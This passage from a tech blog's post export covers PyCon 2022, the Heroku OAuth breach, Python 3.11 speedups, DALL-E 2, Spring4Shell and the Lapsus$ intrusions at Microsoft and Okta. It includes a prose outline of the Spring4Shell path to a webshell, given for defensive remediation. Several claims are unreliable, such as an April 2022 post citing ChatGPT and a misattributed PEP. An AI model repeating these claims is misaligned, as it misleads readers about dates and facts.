wanted types, I\u0026rsquo;d write Java.\u0026rdquo; I\u0026rsquo;ll admit I was skeptical myself. But walking the PyCon halls this year, it\u0026rsquo;s clear that type hints have won. Not in the sense that everyone uses them — Python remains dynamically typed at runtime — but in the sense that serious projects increasingly treat them as essential.\nThe tooling ecosystem around types has exploded. mypy is the established player, but pyright (from Microsoft, powering Pylance in VS Code) has become incredibly capable. The experience of writing typed Python in a modern editor with Pylance is genuinely excellent — better than many statically typed languages, because you get the safety net without the ceremony.\nWhat\u0026rsquo;s particularly interesting is how type hints are enabling new patterns. Libraries like Pydantic use type annotations for runtime data validation, FastAPI builds its entire request/response handling on them, and SQLModel combines them with SQLAlchemy for type-safe database access. Types have become a protocol for libraries to communicate with each other, which was always the real value proposition.\nThe Packaging Saga Continues # If there\u0026rsquo;s one topic that reliably generates heated discussion at PyCon, it\u0026rsquo;s packaging. The Python packaging ecosystem has been a source of frustration for years — pip, setuptools, wheel, poetry, flit, pdm, hatch — the options are overwhelming and the \u0026ldquo;right\u0026rdquo; choice changes depending on who you ask.\nThis year, there\u0026rsquo;s cautious optimism. PEP 621 has standardized project metadata in pyproject.toml, which means tools can finally agree on the basics even if they differ in workflow. The new installer and build projects from PyPA are cleaning up the lower layers of the stack.\nBut honestly? I\u0026rsquo;ve been hearing \u0026ldquo;packaging is getting better\u0026rdquo; at PyCon for a decade. The fundamental challenge is that Python\u0026rsquo;s packaging story grew organically from a very different era, and the backwards compatibility constraints are enormous. Every improvement has to work with the millions of existing packages on PyPI. It\u0026rsquo;s an incredibly hard problem, and I respect the people working on it even when I\u0026rsquo;m cursing at my terminal trying to resolve dependency conflicts.\nPython in the Cloud-Native World # One trend that\u0026rsquo;s clearly visible at this year\u0026rsquo;s PyCon is Python\u0026rsquo;s growing role in cloud-native development. AWS Lambda, Google Cloud Functions, and Azure Functions all have first-class Python support. Tools like Pulumi let you define infrastructure in Python. Even Kubernetes operators are increasingly written in Python using frameworks like kopf.\nThis matters because it means Python developers don\u0026rsquo;t have to context-switch to another language for their infrastructure code. Your application code, your tests, your deployment scripts, your monitoring hooks — all Python. Whether that\u0026rsquo;s a good idea is debatable (I\u0026rsquo;ve seen some horrifying Python-based infrastructure code), but the option is there and people are using it.\nMy Take # PyCon US 2022 feels like a celebration of a language that has found its stride. Python isn\u0026rsquo;t trying to be everything to everyone anymore — it knows what it\u0026rsquo;s good at and it\u0026rsquo;s getting better at those things. The performance improvements are real, the type system is maturing, and the ecosystem breadth is unmatched.\nWhat strikes me most is the community. In an industry that can be tribal and exclusionary, PyCon remains remarkably welcoming. The hallway conversations I\u0026rsquo;ve had this week range from first-time programmers to CPython core developers, and everyone seems genuinely happy to be here.\nIf you\u0026rsquo;re not already writing Python, you probably should be — at least for some part of your toolkit. And if you are, it\u0026rsquo;s a great time to be in this ecosystem. Now if they could just fix packaging once and for all, we\u0026rsquo;d be golden.\n","date":"28 April 2022","externalUrl":null,"permalink":"/posts/220428-pycon-us-2022-python-momentum/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"PyCon US 2022 kicks off in Salt Lake City with Python riding high as the world’s most popular programming language.","title":"PyCon US 2022 — Python's Momentum Shows No Signs of Slowing","type":"posts"},{"content":"Last week, Salesforce disclosed that Heroku had suffered a significant security breach. Attackers gained access to a database containing OAuth tokens for GitHub integrations, potentially compromising thousands of repositories. Heroku has been revoking tokens, but the incident raises uncomfortable questions about the trust we place in platform services that sit at the intersection of our most sensitive assets: source code and deployment infrastructure.\nFor those of us who have been building on PaaS platforms since the early days, this feels like a turning point. Not because breaches are new — they\u0026rsquo;re depressingly routine — but because of where this breach sits in the software supply chain.\nThe Anatomy of a Platform Trust Chain # When you connect Heroku to GitHub via OAuth, you\u0026rsquo;re granting a third party persistent access to your repositories. That token doesn\u0026rsquo;t just let Heroku pull code for deployments — depending on the scopes granted, it can read private repos, access organization data, and more. Most developers click \u0026ldquo;Authorize\u0026rdquo; without a second thought, because Heroku is a trusted name. It\u0026rsquo;s Salesforce. It\u0026rsquo;s enterprise.\nBut that trust is transitive. You\u0026rsquo;re not just trusting Heroku\u0026rsquo;s application security — you\u0026rsquo;re trusting their entire infrastructure stack, their employee access controls, their incident response capabilities, and every third-party service they themselves depend on. It\u0026rsquo;s turtles all the way down.\nThe breach reportedly originated from compromised Heroku machine accounts that had access to a database storing GitHub integration OAuth tokens. That\u0026rsquo;s a classic lateral movement pattern: compromise one component, pivot to the treasure. The tokens themselves are the treasure because they unlock access to potentially thousands of downstream repositories.\nSupply Chain Security Is Not Optional Anymore # I\u0026rsquo;ve been writing about supply chain security for a while now, and every few months we get another reminder that this problem isn\u0026rsquo;t going away. After SolarWinds, after Log4j, after the npm protestware incidents — the pattern is clear. Attackers are increasingly targeting the infrastructure and tooling that developers trust implicitly.\nWhat makes this Heroku incident particularly concerning is the blast radius. Heroku isn\u0026rsquo;t just used by hobbyists running side projects (though it\u0026rsquo;s great for that). It\u0026rsquo;s used by startups, agencies, and enterprises for production workloads. Every one of those customers who had a GitHub integration enabled is now wondering: did someone access my code? Did they inject anything? How would I even know?\nGitHub has published their own advisory and is notifying affected users. They\u0026rsquo;ve also revoked tokens proactively where they detected suspicious activity. But the fundamental problem remains: we have too many long-lived tokens floating around with broad permissions, and no good way to audit what they\u0026rsquo;ve been used for after the fact.\nWhat You Should Do Right Now # If you\u0026rsquo;re a Heroku user with GitHub integrations, here\u0026rsquo;s my practical advice:\n1. Audit your OAuth grants. Go to GitHub → Settings → Applications → Authorized OAuth Apps. Review everything. Revoke anything you don\u0026rsquo;t actively need. This isn\u0026rsquo;t just about Heroku — do this for every integration.\n2. Check your audit logs. If you\u0026rsquo;re on a GitHub organization plan, review the audit log for any suspicious activity on your repositories. Look for unexpected clones, branch creations, or webhook modifications.\n3. Rotate your secrets. If your repositories contain any secrets (and they shouldn\u0026rsquo;t, but let\u0026rsquo;s be realistic), rotate them. All of them. Environment variables, API keys, database credentials — assume they\u0026rsquo;ve been read.\n4. Consider your token hygiene. This is a good time to adopt short-lived tokens where possible. GitHub\u0026rsquo;s fine-grained personal access tokens (currently in beta) offer much better scoping than the classic tokens. Use them.\n5. Re-evaluate your PaaS dependency. I\u0026rsquo;m not saying abandon Heroku, but think critically about what permissions you\u0026rsquo;ve granted and whether you could achieve the same deployment workflow with fewer privileges. GitHub Actions deploying to a container runtime, for instance, keeps the OAuth surface area much smaller.\nThe Bigger Picture: Zero Trust for Developer Tools # The security industry has been pushing \u0026ldquo;zero trust\u0026rdquo; architecture for years, but most of that conversation focuses on network access and identity management for end users. We need to apply the same principles to our development toolchain.\nEvery CI/CD pipeline, every deployment platform, every code quality tool that has access to your repositories is a potential attack vector. The principle should be: minimum viable permissions, maximum viable monitoring, and regular rotation of all credentials.\nI\u0026rsquo;ve spent over three decades watching the industry cycle through \u0026ldquo;trust everything\u0026rdquo; and \u0026ldquo;trust nothing\u0026rdquo; phases. The reality is somewhere in between, but right now we\u0026rsquo;re way too far on the trusting side when it comes to developer tooling. We scrutinize every dependency in our package.json but hand out OAuth tokens to platforms like candy.\nMy Take # This breach is a symptom of a deeper problem in how we\u0026rsquo;ve built the modern development ecosystem. We\u0026rsquo;ve optimized relentlessly for developer experience — click a button, authorize an app, deploy in seconds — without building the corresponding security infrastructure to manage the trust relationships we\u0026rsquo;re creating.\nHeroku will recover from this. They\u0026rsquo;ll improve their security posture, publish a post-mortem, and most users will reconnect their integrations. But the lesson we should take away isn\u0026rsquo;t about Heroku specifically. It\u0026rsquo;s about the web of trust we\u0026rsquo;ve woven across our toolchains and how fragile it really is.\nStart auditing your OAuth grants today. You might be surprised how many services have access to your code that you\u0026rsquo;ve forgotten about entirely.\n","date":"21 April 2022","externalUrl":null,"permalink":"/posts/220421-heroku-security-breach-supply-chain/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Heroku’s OAuth token breach exposes the fragile trust chain in platform-as-a-service dependencies and what it means for developers.","title":"Heroku's Security Breach — A Wake-Up Call for Platform Trust","type":"posts"},{"content":"For as long as I\u0026rsquo;ve been using Python — and that goes back to the 1.5 days — \u0026ldquo;Python is slow\u0026rdquo; has been the criticism that never goes away. It\u0026rsquo;s the tax you pay for the language\u0026rsquo;s expressiveness, readability, and enormous ecosystem. The consolidation of Python 3 as the standard opened up opportunities for optimization that the dual-version ecosystem had previously prevented. You accept the performance tradeoff, reach for C extensions or PyPy when it really matters, and move on with your life.\nBut the latest alpha releases of Python 3.11 are suggesting that the tradeoff may be getting significantly less painful. The Faster CPython project, led by Mark Shannon and funded by Microsoft (which hired Shannon and Guido van Rossum specifically for this effort), is producing results that have the Python community genuinely excited. Benchmarks on the alpha releases are showing 10-60% speedups across the pyperformance suite compared to Python 3.10, with some individual benchmarks improving even more dramatically.\nWhat\u0026rsquo;s Actually Changing # The speedups in Python 3.11 come from several complementary optimizations, all targeting the CPython interpreter rather than changing the language itself. This is important — your existing Python code gets faster without any modifications. Building on the language feature additions of Python 3.10\u0026rsquo;s structural pattern matching and Python 3.9\u0026rsquo;s improvements, Python 3.11 marks a significant shift in focus toward performance.\nSpecializing Adaptive Interpreter. This is the big one. Python 3.11 introduces a specializing adaptive interpreter (PEP 659) that optimizes bytecode at runtime based on the types it actually encounters. When the interpreter sees that a particular LOAD_ATTR instruction consistently accesses an attribute on the same type of object, it replaces the generic instruction with a specialized version that skips the general-purpose attribute lookup.\nThis is conceptually similar to what JIT compilers do, but it\u0026rsquo;s implemented as bytecode specialization rather than native code generation. Each bytecode instruction has a counter, and after being executed enough times with the same type pattern, it gets \u0026ldquo;quickened\u0026rdquo; to a specialized version. If the type assumption later breaks, it reverts to the generic version. This approach avoids the complexity and warmup time of a full JIT while still capturing a significant portion of the benefit.\nFaster Startup. Python 3.11 includes frozen imports for the standard library (PEP 690 work), reducing the overhead of importing common modules. If you\u0026rsquo;ve ever profiled a Python application\u0026rsquo;s startup, you know that importing the standard library can account for a surprising chunk of time.\nCheaper Exceptions. The cost of try/except blocks when no exception is raised has been reduced to near-zero in Python 3.11. Previously, entering a try block had a measurable overhead even in the happy path. This matters because try/except is used extensively in Pythonic code — \u0026ldquo;ask forgiveness, not permission\u0026rdquo; is a language idiom, and the performance penalty for following it has always been a quiet friction.\nFrame Object Laziness. Python 3.11 lazily creates frame objects — the internal data structures that represent function call stack frames. Previously, a frame object was created for every function call. Now, the interpreter uses a more compact internal representation and only creates the full frame object when something actually needs it (like a debugger or sys._getframe()).\nThe Benchmark Numbers # The pyperformance benchmark suite is the standard tool for measuring CPython performance across a range of real-world workloads. On the 3.11 alphas, the results are impressive:\nOverall geometric mean: ~25% faster than Python 3.10 Some benchmarks like spectral_norm show 40-60% improvement Startup time for python -c \u0026quot;pass\u0026quot; is measurably faster Exception-heavy code paths show significant gains These aren\u0026rsquo;t micro-benchmarks designed to flatter the optimizer. The pyperformance suite includes template rendering, regular expressions, JSON serialization, scientific computing kernels, and other realistic workloads.\nIt\u0026rsquo;s worth noting that I/O-bound applications — which is what many web services and data pipelines are — won\u0026rsquo;t see the full benefit of CPU-level optimizations. If your application spends most of its time waiting on database queries or HTTP responses, a 25% faster interpreter doesn\u0026rsquo;t translate to a 25% faster application. But for compute-heavy tasks, data processing pipelines, and application startup, the improvements are very real.\nThe Faster CPython Roadmap # What makes this particularly exciting is that Python 3.11 is explicitly positioned as just the first phase. The Faster CPython project has a multi-release roadmap:\nPython 3.11 (this release): Specializing adaptive interpreter, frame optimizations — targeting 1.25x faster (they\u0026rsquo;re hitting this) Python 3.12: More aggressive specializations, potential for a basic JIT compiler — targeting 2x faster than 3.10 Future releases: Progressively more sophisticated optimization — aspirational target of 5x faster than 3.10 A 5x improvement over the current interpreter would fundamentally change the performance conversation around Python. It wouldn\u0026rsquo;t match C or Rust, but it would put Python in the same ballpark as Java and JavaScript V8 for many workloads — languages that nobody dismisses as \u0026ldquo;too slow for production.\u0026rdquo;\nWhy This Matters Beyond Benchmarks # The performance improvements in Python 3.11 matter for reasons beyond raw execution speed:\nLower barrier for Python in new domains. There are projects today where teams choose Go, Java, or even Node.js over Python specifically because of performance requirements. Narrowing that gap expands the range of problems where Python is a viable choice.\nReduced cloud costs. If your Python Lambda functions or container workloads run 25% faster, that translates directly to reduced compute costs. At scale, this is real money. I\u0026rsquo;ve seen organizations spend significant effort rewriting Python services in Go purely for cost reasons — faster CPython makes that calculus different.\nBetter developer experience. Faster startup means faster test suites, faster CLI tools, and snappier development workflows. The cumulative effect on developer productivity is hard to measure but very real.\nMy Take # I\u0026rsquo;ve watched Python\u0026rsquo;s performance story evolve over decades, from the early days when nobody cared about speed because scripts were small, through the era of \u0026ldquo;just use C extensions,\u0026rdquo; to the current moment where Microsoft is funding a multi-year effort to make CPython itself faster. The Python 2 to Python 3 transition showed that the community could move together toward a unified vision, and now that vision includes bringing Python into the performance tier of compiled languages.\nThe Faster CPython project feels like the most promising thing to happen to Python performance since PyPy. The key difference is that these improvements are landing in CPython itself — the reference implementation that 95%+ of Python users actually run. PyPy\u0026rsquo;s performance was always excellent, but the compatibility gaps and ecosystem friction limited its adoption. CPython optimizations have no such barrier — you just upgrade Python and your code gets faster.\nI\u0026rsquo;m cautiously optimistic that the 3.12 and beyond targets are achievable. Mark Shannon\u0026rsquo;s track record and the team\u0026rsquo;s methodical approach — focusing on well-understood optimization techniques rather than moonshot redesigns — gives me confidence.\nIf you\u0026rsquo;re running Python in production, start testing your applications against the 3.11 alphas and betas. The final release is expected in October, and you\u0026rsquo;ll want to be ready to upgrade quickly. This is the rare Python release where \u0026ldquo;what\u0026rsquo;s new\u0026rdquo; includes a compelling performance pitch alongside the usual language features.\nThe age of \u0026ldquo;Python is slow, deal with it\u0026rdquo; may finally be coming to an end.\n","date":"14 April 2022","externalUrl":null,"permalink":"/posts/220414-python-311-faster-cpython/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Python 3.11 alpha releases show 10-60% speedups across benchmarks, driven by the Faster CPython project — and this is just the beginning.","title":"Python 3.11 Is Shaping Up to Be Seriously Fast","type":"posts"},{"content":"OpenAI unveiled DALL-E 2 last week, and I have to admit — this one genuinely stopped me in my tracks. As someone who has followed AI research for years and has developed a healthy skepticism toward demo-driven hype, the outputs from DALL-E 2 are in a different league from anything I\u0026rsquo;ve seen before. We\u0026rsquo;re not looking at incremental improvement over the original DALL-E. This is a qualitative leap. The progression from GPT-3\u0026rsquo;s text capabilities through ChatGPT\u0026rsquo;s conversational abilities to DALL-E 2\u0026rsquo;s image generation shows OpenAI\u0026rsquo;s systematic advancement across modalities.\nDALL-E 2 generates photorealistic images from natural language descriptions at a resolution and coherence level that would have seemed impossible even a year ago. It can also edit existing images, fill in regions based on context, and create variations of an input image — all guided by text prompts. The implications for creative work, software development, and the broader information landscape are profound.\nHow DALL-E 2 Works # The technical approach is fascinating and represents a departure from the original DALL-E\u0026rsquo;s architecture. While DALL-E 1 used a discrete variational autoencoder (dVAE) paired with a transformer, DALL-E 2 is built on a diffusion model architecture combined with CLIP (Contrastive Language-Image Pre-Training).\nThe system works in two stages. First, a CLIP text encoder maps the text prompt to an embedding in CLIP\u0026rsquo;s joint text-image space. Then, a \u0026ldquo;prior\u0026rdquo; model generates a CLIP image embedding from the text embedding. Finally, a diffusion decoder (which OpenAI calls \u0026ldquo;unCLIP\u0026rdquo;) generates the actual image from the CLIP image embedding.\nThe use of diffusion models is particularly significant. Diffusion models work by learning to reverse a gradual noising process — starting from pure noise and iteratively denoising to produce a coherent image. This approach has been showing remarkable results across the field, with Dhariwal and Nichol\u0026rsquo;s work last year demonstrating that diffusion models could beat GANs on image synthesis quality.\nWhat\u0026rsquo;s impressive about DALL-E 2 is how well it handles compositional prompts — \u0026ldquo;an astronaut riding a horse in a photorealistic style\u0026rdquo; produces exactly what you\u0026rsquo;d expect, with correct spatial relationships, lighting, and perspective. The original DALL-E often struggled with compositionality, producing images that captured individual concepts but fumbled their relationships.\nThe Inpainting and Editing Capabilities # Beyond generation from scratch, DALL-E 2\u0026rsquo;s ability to edit existing images is where things get really interesting from a practical standpoint. You can select a region of an image and ask the system to fill it with something new, while maintaining coherence with the surrounding context — shadows, reflections, textures all match naturally.\nThis \u0026ldquo;inpainting\u0026rdquo; capability builds on techniques that have existed in image processing for years, but the quality and semantic understanding here is unprecedented. You\u0026rsquo;re not just doing texture synthesis or content-aware fill — you\u0026rsquo;re telling the system \u0026ldquo;add a flamingo to this living room\u0026rdquo; and getting a result that looks like someone actually photographed a flamingo in that specific room with that specific lighting.\nFor developers building content creation tools, design applications, or any interface that involves image manipulation, this is a technology to watch closely. The API implications alone could reshape how we think about image assets in software development. This represents the multimodal AI future that companies like Google are also pursuing.\nWhat This Means for the Industry # DALL-E 2 is part of a broader wave of multimodal AI systems that can understand and generate across text, images, and eventually other modalities. This capability has significant implications for how we build software and how creative professionals work.\nI see several immediate implications:\nStock photography is facing disruption. If you can generate a photorealistic image of any concept in seconds, the value proposition of stock photo libraries changes fundamentally. Why search through thousands of images for something close to what you need when you can describe exactly what you want?\nDesign workflows will evolve. The ability to iterate on visual concepts through natural language — \u0026ldquo;make it more dramatic,\u0026rdquo; \u0026ldquo;change the color palette to warm tones,\u0026rdquo; \u0026ldquo;add a mountain in the background\u0026rdquo; — collapses the iteration cycle for concept art, marketing materials, and UI design from hours to minutes.\nContent moderation becomes harder. Photorealistic AI-generated images at this quality level make it significantly more difficult to distinguish synthetic content from real photographs. The implications for misinformation, fraud, and trust in visual media are concerning.\nAccessibility of visual creation. People who can describe what they want but lack the technical skill to create it in Photoshop or Illustrator suddenly have a powerful tool. This democratization is genuinely exciting, but it also raises questions about the value of visual craftsmanship.\nThe Limitations and Risks # OpenAI is being cautious with DALL-E 2\u0026rsquo;s rollout, and for good reason. The system is currently limited to a small group of trusted users, with guardrails against generating violent, sexual, or politically inflammatory content. It also struggles with certain types of prompts — text rendering within images is still poor, and highly specific technical diagrams or UI layouts aren\u0026rsquo;t within its capabilities.\nThere are also significant ethical and legal questions that haven\u0026rsquo;t been resolved. DALL-E 2 was trained on images scraped from the internet, raising questions about artistic copyright and the rights of creators whose work was used for training. If the system generates an image that closely resembles an existing copyrighted work, who\u0026rsquo;s liable? These questions don\u0026rsquo;t have clear answers yet, and they\u0026rsquo;ll need to be addressed before this technology sees widespread commercial use.\nOpenAI has also acknowledged the risk of bias in generated images. The training data reflects existing biases in visual media, which means the system can perpetuate stereotypes in its outputs — for example, generating predominantly white faces for \u0026ldquo;CEO\u0026rdquo; or predominantly male faces for \u0026ldquo;engineer.\u0026rdquo;\nMy Take # I\u0026rsquo;ve been working in tech long enough to have seen many \u0026ldquo;this changes everything\u0026rdquo; moments that turned out to be \u0026ldquo;this changes some things, gradually.\u0026rdquo; But DALL-E 2 feels different to me. The gap between what I expected from AI image generation in 2022 and what DALL-E 2 actually delivers is the largest surprise I\u0026rsquo;ve experienced in recent years.\nWhat excites me most isn\u0026rsquo;t the generation quality — it\u0026rsquo;s the interface. Natural language as a creative tool is incredibly powerful because it meets people where they already are. You don\u0026rsquo;t need to learn Photoshop\u0026rsquo;s tool palette or master digital painting techniques. You just need to be able to describe what you want.\nFor software developers specifically, I\u0026rsquo;d keep a close eye on how OpenAI plans to offer API access. Integrating text-to-image generation into applications — from design tools to e-commerce platforms to documentation systems — could open up entirely new product categories.\nWe\u0026rsquo;re watching the early days of something significant. The question isn\u0026rsquo;t whether AI image generation will transform creative workflows — it\u0026rsquo;s how quickly, and what we\u0026rsquo;ll build on top of it.\n","date":"7 April 2022","externalUrl":null,"permalink":"/posts/220407-dall-e-2-ai-image-generation/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s DALL-E 2 produces photorealistic images from text descriptions with stunning accuracy, signaling a paradigm shift in how we think about creative AI.","title":"DALL-E 2 and the New Frontier of AI Image Generation","type":"posts"},{"content":"Just when we thought we could go a few months without a critical framework vulnerability dominating every security channel, Spring4Shell (CVE-2022-22965) has arrived. A remote code execution vulnerability in the Spring Framework — arguably the most widely used Java application framework in the world — was disclosed this week, and the internet immediately went into panic mode with flashbacks to December\u0026rsquo;s Log4Shell disaster.\nBut after spending a couple of days analyzing this one, I think the reality is more nuanced than the catchy name suggests. Let me break down what we actually know.\nWhat\u0026rsquo;s the Vulnerability? # CVE-2022-22965 is a remote code execution (RCE) vulnerability affecting Spring MVC and Spring WebFlux applications running on JDK 9 or later. The vulnerability exploits a class-level data binding mechanism in Spring that, under specific conditions, allows an attacker to modify the class.module.classLoader properties through crafted HTTP requests.\nThe practical exploitation path that\u0026rsquo;s been demonstrated involves manipulating Tomcat\u0026rsquo;s AccessLogValve through the classloader to write a JSP webshell to the server. Once the webshell is planted, the attacker has arbitrary command execution on the server.\nSpring has released patches in Spring Framework 5.3.18 and 5.2.20, and Spring Boot 2.6.6 and 2.5.12 include the fixed versions. If you\u0026rsquo;re running Spring in production, stop reading and go patch. I\u0026rsquo;ll wait.\nWhy It\u0026rsquo;s Not Quite Log4Shell # The inevitable comparisons to Log4Shell are understandable — both affect ubiquitous Java frameworks, both enable RCE, and both have catchy names with \u0026ldquo;4\u0026rdquo; and \u0026ldquo;Shell\u0026rdquo; in them. But the actual risk profiles are significantly different:\nThe conditions are more restrictive. The known exploitation requires: (1) Spring MVC or WebFlux, (2) running on JDK 9+, (3) deployed as a WAR to a servlet container like Tomcat, and (4) using Spring\u0026rsquo;s data binding with specific parameter types. That\u0026rsquo;s a meaningful set of prerequisites. Many Spring Boot applications deploy as embedded containers (executable JARs), which changes the exploitation path.\nLog4Shell was trivially exploitable. A single crafted string in any log message could trigger the vulnerability. Spring4Shell requires more targeted exploitation — the attacker needs to know or guess specific endpoint parameters and the application\u0026rsquo;s data binding configuration.\nThe attack surface is narrower. Log4Shell could be triggered through any input that ended up in a log statement — HTTP headers, form fields, query parameters, you name it. Spring4Shell requires specific HTTP request parameters that map to Spring\u0026rsquo;s data binding.\nThis doesn\u0026rsquo;t mean you should ignore it. It means you should prioritize patching without succumbing to the same level of all-hands-on-deck panic that Log4Shell warranted.\nThe Confusing Disclosure Timeline # One of the frustrating aspects of this vulnerability has been the messy disclosure process. The CVE was initially confused with a separate Spring Cloud Function vulnerability (CVE-2022-22963), leading to widespread confusion in the first 24 hours. Proof-of-concept code was circulating on Chinese social media before the official advisory was published, and early reports mixed up the two issues.\nThis led to a situation where some organizations patched for the wrong vulnerability, while others dismissed the whole thing as overblown FUD. Neither response was correct.\nThe confusion was compounded by the fact that there was also a critical zero-day in Spring Cloud Gateway (CVE-2022-22947) disclosed around the same time. Three Spring-related CVEs in quick succession, all with similar numbering, all affecting different components. It\u0026rsquo;s been a rough week for anyone maintaining Spring-based infrastructure.\nPractical Remediation Steps # Here\u0026rsquo;s what I\u0026rsquo;d recommend, in order of priority:\n1. Patch immediately. Upgrade to Spring Framework 5.3.18+ or 5.2.20+, or Spring Boot 2.6.6+ / 2.5.12+. This is the definitive fix.\n2. If you can\u0026rsquo;t patch today, apply the workaround. Spring has documented a workaround using @ControllerAdvice to set DataBinder.setDisallowedFields() for class.*, Class.*, *.class.*, and *.Class.*. This prevents the property binding path that enables exploitation.\n3. Check your JDK version. If you\u0026rsquo;re still on JDK 8 (and plenty of production systems are), you\u0026rsquo;re not affected by the known exploitation path. That said, don\u0026rsquo;t let this be a reason to delay patching — other exploitation paths may emerge.\n4. Review your WAF rules. Many WAF vendors have already published rules to detect Spring4Shell exploitation attempts. Adding these as a defense-in-depth layer buys you time while patching works through your deployment pipeline.\n5. Monitor for indicators of compromise. Look for unusual JSP files appearing in your web application directories, unexpected outbound connections from application servers, and web server access logs with suspicious parameter patterns targeting classloader properties.\nThe Bigger Picture: Framework Security Fatigue # What concerns me most isn\u0026rsquo;t this specific vulnerability — it\u0026rsquo;s the pattern. Log4Shell in December, and now Spring4Shell in March. Two of the most fundamental pieces of the Java ecosystem, both with critical RCE vulnerabilities, discovered within four months of each other.\nThe Java ecosystem\u0026rsquo;s heavy reliance on reflection, dynamic class loading, and runtime binding has always been a double-edged sword. These features enable the powerful framework abstractions that make Spring so productive, but they also create attack surfaces that are difficult to reason about and easy to overlook.\nI\u0026rsquo;ve been writing Java professionally since the late 1990s, and the framework surface area has grown enormously. A modern Spring Boot application pulls in dozens of auto-configured components, each with their own assumptions about data binding, serialization, and request handling. The total attack surface is vast, and much of it is invisible to application developers who just want to write business logic.\nMy Take # Patch this, but don\u0026rsquo;t panic. Spring4Shell is serious, but it\u0026rsquo;s not the same class of catastrophe as Log4Shell. The exploitation conditions are more specific, the blast radius is more contained, and patches are already available.\nWhat I hope comes out of this is a renewed focus on secure-by-default configurations in major frameworks. Spring\u0026rsquo;s data binding is powerful, but the ability to bind arbitrary request parameters to internal class properties should never have been accessible without explicit opt-in. The principle of least privilege should apply to framework features, not just user permissions.\nIn the meantime, update your dependencies and make sure your vulnerability scanning pipeline can detect this. And maybe pour one out for the Spring security team, who I imagine haven\u0026rsquo;t slept much this week.\n","date":"31 March 2022","externalUrl":null,"permalink":"/posts/220331-spring4shell-cve-2022-22965/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A critical RCE vulnerability in Spring Framework has the internet in panic mode, but the actual risk profile is more nuanced than the Log4Shell comparisons suggest.","title":"Spring4Shell Is Here — Assessing the Real Risk of CVE-2022-22965","type":"posts"},{"content":"If you work in enterprise software — and especially if you\u0026rsquo;re responsible for authentication infrastructure — this has been a very uncomfortable week. The Lapsus$ hacking group, which has been on a remarkable tear over the past few months, has now confirmed breaches of both Microsoft and Okta, two of the most critical identity and access management providers in the industry.\nThe Okta breach is particularly alarming. Okta provides single sign-on and identity services to over 15,000 organizations. A compromise here doesn\u0026rsquo;t just affect Okta — it potentially affects every downstream customer. This is the identity provider nightmare scenario that security architects have warned about for years.\nThe Okta Situation # On March 22, Lapsus$ posted screenshots on Telegram appearing to show access to Okta\u0026rsquo;s internal systems, including what looked like Okta\u0026rsquo;s Superuser/Admin portal and Slack channels. Okta\u0026rsquo;s initial response was that the breach was related to a January 2022 security incident involving a third-party contractor, Sitel (which provides customer support services for Okta), and that the impact was limited.\nAccording to Okta\u0026rsquo;s initial statement, approximately 2.5% of their customers — roughly 375 organizations — may have been affected. The access was reportedly limited to what a support engineer could see and do, which still includes the ability to reset passwords and MFA tokens for customer accounts.\nLet that sink in. A third-party support contractor\u0026rsquo;s compromised account could potentially reset authentication for hundreds of enterprise customers. This is not a theoretical attack — it happened, and the blast radius is enormous.\nMicrosoft\u0026rsquo;s Breach # Microsoft confirmed that Lapsus$ gained \u0026ldquo;limited access\u0026rdquo; to their systems, with the group claiming to have exfiltrated source code from Bing, Bing Maps, and Cortana. Microsoft\u0026rsquo;s blog post (they track the group as DEV-0537) detailed the group\u0026rsquo;s tactics: social engineering, SIM swapping, and targeting personal accounts of employees to find credentials that might provide corporate access.\nWhat strikes me about the Microsoft breach is the group\u0026rsquo;s brazenness. They posted a screenshot of what appeared to be an Azure DevOps instance containing Microsoft source code repositories while they still had access. Microsoft says they shut down the access mid-operation, and that no customer data was compromised. The leaked source code, while embarrassing, doesn\u0026rsquo;t necessarily constitute a critical security risk given that much of Microsoft\u0026rsquo;s security model doesn\u0026rsquo;t rely on source code secrecy.\nThe Lapsus$ Playbook # What\u0026rsquo;s fascinating — and terrifying — about Lapsus$ is their methodology. This isn\u0026rsquo;t a nation-state APT using zero-days and custom malware. Their playbook is almost entirely based on social engineering and identity compromise:\nRecruit insiders. Lapsus$ has openly advertised on Telegram for employees at target companies willing to provide VPN credentials, remote access, or other initial footholds. They reportedly pay well.\nSIM swapping. By convincing mobile carriers to transfer a target\u0026rsquo;s phone number to an attacker-controlled SIM, they can intercept SMS-based MFA codes. This effectively bypasses one of the most common second-factor authentication methods.\nCredential harvesting. They target personal email accounts and devices, looking for corporate credentials that employees have saved or synced outside of corporate security boundaries.\nMFA fatigue attacks. Repeatedly sending MFA push notifications until the target gives up and approves one, typically in the middle of the night. I\u0026rsquo;ve seen this technique described before, but Lapsus$ appears to have operationalized it at scale.\nNone of these techniques are novel. But the combination, executed with speed and audacity against high-profile targets, has proven remarkably effective.\nWhat This Means for Identity Architecture # The Okta breach forces a reckoning with how we think about identity provider security. We\u0026rsquo;ve spent years consolidating authentication through providers like Okta, Azure AD, and Auth0, and for good reason — centralized identity management is far better than every application rolling its own auth. But centralization creates concentration risk.\nA few things I\u0026rsquo;m thinking about:\nThird-party access is your attack surface. Okta wasn\u0026rsquo;t breached through their core engineering team — it was through a support contractor. Every organization that provides elevated access to vendors, contractors, or support partners needs to reassess. What can those accounts see? What actions can they take? Are they monitored with the same rigor as internal privileged accounts?\nSMS-based MFA is not enough. If Lapsus$ can defeat SMS MFA through SIM swapping, and push-notification MFA through fatigue attacks, we need to be moving toward phishing-resistant authenticators. FIDO2/WebAuthn security keys and platform authenticators (Windows Hello, Touch ID) are significantly harder to compromise because they\u0026rsquo;re bound to a specific origin and device.\nZero trust isn\u0026rsquo;t just a marketing term. The principle that no access should be implicitly trusted based on network location is exactly the kind of architecture that limits blast radius. Even if an attacker gets valid credentials, every access request should be evaluated based on device posture, behavioral signals, and least-privilege principles.\nMy Take # I\u0026rsquo;ve been building and advising on authentication systems for a long time, and the Okta situation is a wake-up call that many of us needed. We\u0026rsquo;ve gotten comfortable treating our identity provider as a trusted black box — plug it in, enable SSO, check the compliance checkbox. But who watches the watchers?\nThe uncomfortable truth is that Lapsus$ isn\u0026rsquo;t doing anything technically sophisticated. They\u0026rsquo;re exploiting the human layer — the same layer we\u0026rsquo;ve always known is the weakest link. The difference is they\u0026rsquo;re doing it systematically and at scale against the providers we depend on most.\nMy immediate advice: audit your identity provider\u0026rsquo;s support and contractor access model. Enable FIDO2 wherever possible. Implement conditional access policies that limit what 